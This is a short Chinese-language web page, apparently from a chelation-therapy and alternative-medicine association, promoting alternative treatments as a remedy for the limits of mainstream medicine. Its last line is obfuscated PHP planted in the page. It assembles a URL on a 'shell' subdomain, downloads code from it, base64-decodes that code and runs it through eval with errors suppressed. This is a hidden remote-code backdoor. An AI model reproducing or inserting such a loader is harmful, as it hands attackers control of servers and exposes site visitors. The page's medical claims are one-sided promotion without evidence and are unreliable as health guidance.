收藏本站
宗旨 列印 E-mail


螯合療法之醫學學理及臨床研究,預防醫學及健康照護觀念之推廣教育。

「Nothing is everything, Everything can be something」

    每一種醫療方法都有其存在的意義與價值。

一個醫師學會的醫療方法愈多,對疾病處理的方法就愈多元,治癒病患的速度與效果就愈快、愈有效;所謂「同病異治,異病同治」就是這個道理!

    真正尊重生命的態度從事另類醫學的推廣教育,並運用在臨床醫學上,希望能彌補主流醫學的不足與限制,促進國人身心健康。

在研發各種另類 醫療方法的過程中,我更不惜投入人力、心力、財力與時間,不斷展研新的治療處方、調劑方式,以治癒患者、預 防疾病的發生為目標,讓以利益為導向的「不肖經商者」或「黑心產品」完全沒有存在的空間。

 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));